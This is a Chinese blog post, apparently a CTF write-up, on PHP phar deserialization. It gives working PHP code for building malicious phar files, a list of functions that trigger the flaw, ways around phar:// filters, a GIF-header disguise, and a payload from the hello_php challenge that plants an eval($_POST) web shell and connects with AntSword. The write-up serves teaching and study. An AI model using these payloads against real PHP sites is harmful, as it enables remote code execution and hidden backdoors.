mysql 反序列化函数_phar反序列化

最新推荐文章于 2023-04-29 11:41:17 发布
最新推荐文章于 2023-04-29 11:41:17 发布
阅读量1k 收藏 1
点赞数
文章标签: mysql 反序列化函数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42529544/article/details/113306353
版权
本文详细介绍了PHP中的Phar反序列化漏洞,包括Phar文件结构、如何生成和利用Phar反序列化,以及相关函数的影响。通过示例展示了如何构造利用代码,并提到了过滤phar://协议的绕过方法和文件格式伪装技巧。最后,文章提到随着PHP8的发布,Phar反序列化将逐渐减少使用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

phar反序列化

前段时间纵横杯遇到一题反序列化,当时队友做出来了,赛后尝试复现一下,并总结反序列化内容

phar的本质是一种压缩文件,会以序列化的形式存储用户自定义的meta-data

Phar文件结构

stub:phar文件标识,以 __HALT_COMPILER();?>结尾

manifest:压缩文件的属性等信息,以序列化的形式存储自定义的meta-data

contents:压缩文件的内容

signature:签名,在文件末尾

测试

首先将php.ini中的phar.readonly置为Off,否则无法生成phar文件,而且这个参数是无法通过ini_set()进行修改的。

生成phar文件

class TestObject {

}

@unlink("phar.phar");

$phar = new Phar("phar.phar"); //后缀名必须为phar

$phar->startBuffering();

$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub

$o = new TestObject();

$o ->data = 'th1e';

$phar->setMetadata($o); //将自定义的meta-data存入manifest

$phar->addFromString("test.txt", "test"); //添加要压缩的文件

//签名自动计算

$phar->stopBuffering();

?>

打开文件可以看到,以序列化储存的文件

d8379866ff83327ecca720bf98a55138.png

构造利用代码

class TestObject{

function __destruct(){

echo $this->data;

}

}

$filename = $_GET['filename'];

file_exists($filename);

?>

?filename=phar://phar.phar/test.txt

76da8a28a8751e4e459b3b27a93b970c.png

成功打印结果

php的文件系统函数在通过phar://伪协议解析phar文件时,都会将meta-data进行反序列化,知道创宇总结了以下函数

684cde08d5acab1d0a3116080356a836.png

其实不止如此,只要调用了php_stream_open_wrapper的函数,都存在这样的问题,经测试,网上提供的如下函数也都可以:

exif

exif_thumbnail

exif_imagetype

gd

imageloadfont

imagecreatefrom

hash

hash_hmac_file

hash_file

hash_update_file

md5_file

sha1_file

file / url

get_meta_tags

get_headers

mime_content_type

standard

getimagesize

getimagesizefromstring

finfo

finfo_file

finfo_buffer

zip

$zip = new ZipArchive();

$res = $zip->open('c.zip');

$zip->extractTo('phar://test.phar/test');

Postgres

$pdo = new PDO(sprintf("pgsql:host=%s;dbname=%s;user=%s;password=%s", "127.0.0.1", "postgres", "sx", "123456"));

@$pdo->pgsqlCopyFromFile('aa', 'phar://test.phar/aa');

MySQL

LOAD DATA LOCAL INFILE`也会触发这个`php_stream_open_wrapper

class A {

public $s = '';

public function __wakeup () {

system($this->s);

}

}

$m = mysqli_init();

mysqli_options($m, MYSQLI_OPT_LOCAL_INFILE, true);

$s = mysqli_real_connect($m, 'localhost', 'root', '123456', 'easyweb', 3306);

$p = mysqli_query($m, 'LOAD DATA LOCAL INFILE \'phar://test.phar/test\' INTO TABLE a LINES TERMINATED BY \'\r\n\' IGNORE 1 LINES;');

再配置一下mysqld。(非默认配置)

[mysqld]

local-infile=1

secure_file_priv=""

Trick

过滤phar://协议的绕过方式

compress.bzip2://phar://

compress.zlib://phar:///

php://filter/resource=phar://

文件格式绕过

class TestObject {

}

@unlink("phar.phar");

$phar = new Phar("phar.phar");

$phar->startBuffering();

$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub,增加gif文件头

$o = new TestObject();

$phar->setMetadata($o); //将自定义meta-data存入manifest

$phar->addFromString("test.txt", "test"); //添加要压缩的文件

//签名自动计算

$phar->stopBuffering();

?>

增加了GIF89a文件头,从而使其伪装成gif文件

220804c8f2cd7bba87c7858f3d8acc54.png

例子

2020纵横杯hello_php

文件泄漏下载

config.php

000b13177ec8ace3d7d68e12d4bed19f.png

发现后台用户名密码登陆后台

登陆后发现上传接口

0863f89d3f7a2e4deca70eea7225e352.png

class.php

存在phar://反序列化漏洞

d689f6cf1f508f8570e4060fe989256b.png

Payload

class Config{

public $title;

public $comment;

public $logo_url;

public function __construct(){

$this->title= 'th1e\';echo success;@eval($_POST['th1e']);?>';

}

}

$phar = new Phar("aaa.phar"); //后缀名必须为 phar

$phar->startBuffering();

$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');

$object = new Config;

$phar->setMetadata($object); //将自定义的 meta-data 存入 manifest

$phar->addFromString("a.txt", "a"); //添加要压缩的文件

//签名自动计算

$phar->stopBuffering();

上传记录时间戳得到文件名

Index.php

发现函数file_exists

8744a60890af5419f12d434c4a8eb362.png

hello_php/index.php?img=phar://static/457b8d1367383f104cc8e3f8f3bf15d1.jpg/a.txt

此时在看config文件已经写入一句话

2b2c68311fe105cb8a5dbbf799eba314.png

蚁剑连接

d7aea706b310993a0cefc046b62ac510.png

总结

PHP很多框架中文件操作函数使用频繁,Phar反序列的点很多,但随着PHP8的诞生,phar不再进行反序列化,以后phar反序列化也将逐渐淡出人们的视野。

Reference

https://blog.csdn.net/qq_42181428/article/details/100995404

愚者共识
关注
[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar
杨秀璋的专栏
05-30 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF部分题目,包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF,还是学到了很多东西,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
thinkphp3.2.3反序列化利用链分析
qq_53856457的博客
05-21 1112
thinkphp3.2.3反序列化利用链分析 文章目录thinkphp3.2.3反序列化利用链分析前置知识:环境:分析过程 前置知识: PHP反序列化原理 PHP反序列化就是在读取一段字符串然后将字符串反序列化成php对象。 在PHP反序列化的过程中会自动执行一些魔术方法 方法名 ---------------调用条件 __call 调用不可访问或不存在的方法时被调用 __callStatic 调用不可访问或不存在的静态方法时被调用 __clone 进行
mysql-cdc反序列化
知而善学的博客
04-23 614
【代码】mysql-cdc反序列化器。
mysql 反序列化_php反序列化
weixin_39854778的博客
12-21 381
一、 什么是序列化,什么是反序列化编程语言有很多数据类型,比如常见的字符串,整数,数组$str="luoke";$int=10;$arr=array("luoke","10");var_dump($str,$int,$arr);这些我们都可以用serialize将其序列化输出echo serialize($str);echo serialize($int);echo seriali...
mysql反序列化_序列化与反序列化(2)
weixin_35698059的博客
01-19 553
自动对象序列化是转换XML和二进制对象的最简单方法。需要特别说明的是,自动对象序列化仅对公有数据类型和公有数据成员有效。 public class Person{ public string FirstName { get; set; } public char MiddleInitial { get; set; } public string LastName自动对象序列化是转换XML和二进制对...
mysql反序列化,从MySQL反序列化数据
weixin_32644565的博客
01-19 405
in my mysql cell this is stored using serialize functiona:1:{i:0;s:275:"a:4:{s:8:"khghg_id";s:10:"foo1187";s:3:"uri";s:21:"foo/vtory/1187";s:4:"name";s:5:"nmart";s:5:"tuhlmb";a:3:{i:0;s:40:"knuujhs/20...
mysql反序列化表_MySQL JDBC客户端反序列化漏洞
weixin_30984749的博客
02-06 530
阅读:736背景介绍2019年11月底Yang Zhang等人在BlackHat上有个议题,提到MySQL JDBC客户端反序列化漏洞,用到ServerStatusDiffInterceptor,参[1]。2019年12月Welkin给出了部分细节,但当时未解决恶意服务端的组建问题,参[2]。codeplutos利用修改过的MySQL插件成功组建恶意服务端,这个脑洞开得可以。与此同时,他演示了另一...
TOP10之反序列化
weixin_44255856的博客
12-09 679
前言 虽然php反序列化的文章,网上一搜一大把,但是我还是想记录下,方便以后忘了自己在回头来看。 反序列化是什么? 通俗的来说: 序列化是将变量转换为可保存或传输的字符串的过程; 反序列化就是在适当的时候把这个字符串再转化成原来的变量使用; 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性; 序列化有利于存储或传递 PHP 的值,同时不丢失其类型和结构。 通常在使用反序列化时都会...
thinkphp5.1.37 可以读写文件 利用phar反序列化
weixin_45805993的博客
11-29 1067
安洵杯一道题…一开始根本没想到用phar…还是太菜了 tp版本5.1.37TLS 源码 <?php namespace app\index\controller; use think\Controller; class Index extends controller { public function index() { return '<style type="text/css">*{ padding: 0; margin: 0; } div{ pad
【CTFSHOW】web入门反序列化
7ruth0hn的博客
07-25 3679
web254 include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this
mysql 反序列化函数_从MySQL反序列化为多维PHP数组
weixin_29158413的博客
02-27 183
我有一个PHP / MySQL电子商务网站,它将订单详细信息与客户地址信息一起放入序列化数组中.我希望能够提取订单商品字段,对其进行反序列化,然后将订单商品组合成一个可以操作的所有订购商品的主数组,以便计算特定产品的订单数量.当我print_r未序列化的行时,数组看起来像这样.下面是两个订单数组,一个有3个产品,第二个只有一个.数组值为ID#,SKU#,Quantity,Product Name,...
PHP序列化反序列化serialize和unserialize函数
热门推荐
lightWay的博客
02-21 2万+
昨天网上看到一道面试题,如下: “类的属性可以序列化后保存到session中,从而以后可以恢复整个类,这要用到的函数是?” 我记得原来老师说过序列化函数是"serialize",查了下,果不其然,今天记录下,免得忘记。 <?php class aa{ public $a = 1; private $b = 2; protected $c
mysql 反序列化函数_MySQL客户端jdbc反序列化漏洞payload
weixin_29441555的博客
01-21 340
MySQL JDBC Deserialization Payload / MySQL客户端jdbc反序列化漏洞描述当MySQL JDBC url可控时,除了能利用 MySQL 协议读取MySQL Client的本地文件之外,还可以利用客户端在连接服务器时会反序列化 服务器 返回的二进制数据,从而触发反序列化漏洞。详情1. 安装rewrite插件以下安装方式任选其一【任选】编译插件gcc -shar...
Mysql流量分析入手来一步步搭建JDBC反序列化利用的恶意Mysql服务
最新发布
qq_42585535的博客
04-29 1015
利用恶意mysql来进行JDBC反序列化漏洞的利用,这一次,我们试图自己来搭建一个mysql
从一道CTF题学习PHP反序列化漏洞
Fly_鹏程万里
09-17 6481
一、CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP的反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
简单的JDBC反序列化复现
qq_43936524的博客
05-07 4976
文章目录漏洞环境复现代码客户端脚本启动服务器MySQL_Fake_Server服务器 漏洞环境 jdk 1.8.152 需要的依赖库commons-collections 3.1作为本地Gadget JDBC利用采用8.0的版本 <dependencies> <dependency> <groupId>mysql</groupId> <artifactId>mysql-connector-java&l
MySQL jdbc 反序列化分析
YJ_12340的博客
02-02 455
听师傅们说这条链子用的比较广泛,所以最近学一学,本来是想配合着 tabby 或是 codeql 一起看的,但是 tabby 的环境搭建一直有问题,耽误了很久时间,所以就直接看了。
序列化与反序列化
RJ0024的博客
12-02 481
考虑到可读性,数据往往不是以最有效的方式编写,但为了存储或传递数据时更加高效,同时不丢失其类型和结构,可以利用序列化和反序列化函数对数据进行处理。 序列化 将特定格式数据转换为可以恢复的字节串序列 什么时候进行序列化? 1)数据在网络上传输时 2)数据保存到文件中时 (由于序列化返回的是字符串,方便存储于任何地方!) 反序列化 顾名思义,将序列化得出的字符串恢复为原有格式数据的过程 什么时候进行反序列化? 1)程序读取数据的时候 序列化和反序列化的目的是在不影响数据有效性情况下,更高效地存储和传输数据,使程
Java代码审计——JDBC Mysql 反序列化 ServerStatusDiffInterceptor
王嘟嘟的博客
03-21 4189
0x00 前言 反序列化总纲 继detectCustomCollations之后我们再来看看ServerStatusDiffInterceptor 0x01 环境 环境参考Java代码审计——JDBC Mysql 反序列化 detectCustomCollations 0x02 各版本利用条件 https://github.com/fnmsd/MySQL_Fake_Server 8.x: jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&qu
"CTF知识总结:清晰目录,关键技巧精华收录
此外,文档还介绍了一系列与PHP反序列化相关的技巧,包括了__wakeup方法利用、快速析构方法利用、字符逃逸利用等。这些内容涵盖了PHP中反序列化漏洞的利用技巧,对于安全研究人员和CTF选手来说都是必备的知识。 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值